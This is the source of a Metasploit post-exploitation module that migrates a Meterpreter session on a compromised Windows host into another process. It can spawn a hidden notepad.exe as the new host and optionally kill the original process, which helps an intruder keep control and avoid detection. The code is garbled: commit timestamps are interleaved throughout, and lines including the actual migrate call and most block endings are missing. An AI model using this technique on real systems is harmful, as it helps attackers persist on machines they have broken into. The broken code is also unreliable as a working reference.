2011-03-21 02:27:36 +00:00
2014-10-17 16:47:33 +00:00
# This module requires Metasploit: http://metasploit.com/download
2013-10-15 18:50:46 +00:00
# Current source: https://github.com/rapid7/metasploit-framework
2011-03-21 02:27:36 +00:00
require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Post
2013-09-05 18:41:25 +00:00
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Manage Process Migration',
'Description' => %q{ This module will migrate a Meterpreter session from one process
to another. A given process PID to migrate to or the module can spawn one and
migrate to that newly spawned process.},
'License' => MSF_LICENSE,
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ]
2011-11-06 22:02:26 +00:00
2013-08-30 21:28:54 +00:00
OptBool.new( 'SPAWN',[ false,'Spawn process to migrate to. If name for process not given notepad.exe is used.', true]),
OptInt.new( 'PID', [false, 'PID of process to migrate to.']),
OptString.new( 'NAME', [false, 'Name of process to migrate to.']),
OptBool.new( 'KILL', [false, 'Kill original process for the session.', false])
], self.class)
2011-03-21 02:27:36 +00:00
2013-08-30 21:28:54 +00:00
# Run Method for when run command is issued
def run
print_status("Running module against #{sysinfo['Computer']}")
2013-07-02 19:48:04 +00:00
2013-08-30 21:28:54 +00:00
server = session.sys.process.open
original_pid = server.pid
print_status("Current server process: #{server.name} (#{server.pid})")
2011-03-21 02:27:36 +00:00
2013-08-30 21:28:54 +00:00
target_pid = nil
2013-01-04 08:29:34 +00:00
2013-08-30 21:28:54 +00:00
if datastore['SPAWN']
print_status("Spawning notepad.exe process to migrate to")
target_pid = create_temp_proc
elsif datastore['PID'] != 0
target_pid = datastore['PID']
elsif datastore['NAME']
target_pid = session.sys.process[datastore['NAME']]
2012-04-26 07:38:29 +00:00
2013-08-30 21:28:54 +00:00
if not target_pid or not has_pid?(target_pid)
print_error("Process or PID not found")
2011-03-21 02:27:36 +00:00
2013-08-30 21:28:54 +00:00
print_good("Migrating to #{target_pid}")
print_good("Successfully migrated to process #{target_pid}")
rescue ::Exception => e
print_error("Could not migrate in to process.")
print_error("Exception: #{e.class} : #{e}")
2011-03-21 02:27:36 +00:00
2013-08-30 21:28:54 +00:00
if datastore['KILL']
print_status("Killing original process with PID #{original_pid}")
print_good("Successfully killed process with PID #{original_pid}")
2011-03-21 02:27:36 +00:00
2013-08-30 21:28:54 +00:00
# Creates a temp notepad.exe to migrate to depending the architecture.
def create_temp_proc()
2013-10-17 13:30:45 +00:00
# Use the system path for executable to run
cmd = "notepad.exe"
2013-08-30 21:28:54 +00:00
# run hidden
proc = session.sys.process.execute(cmd, nil, {'Hidden' => true })
return proc.pid
2011-10-12 00:01:25 +00:00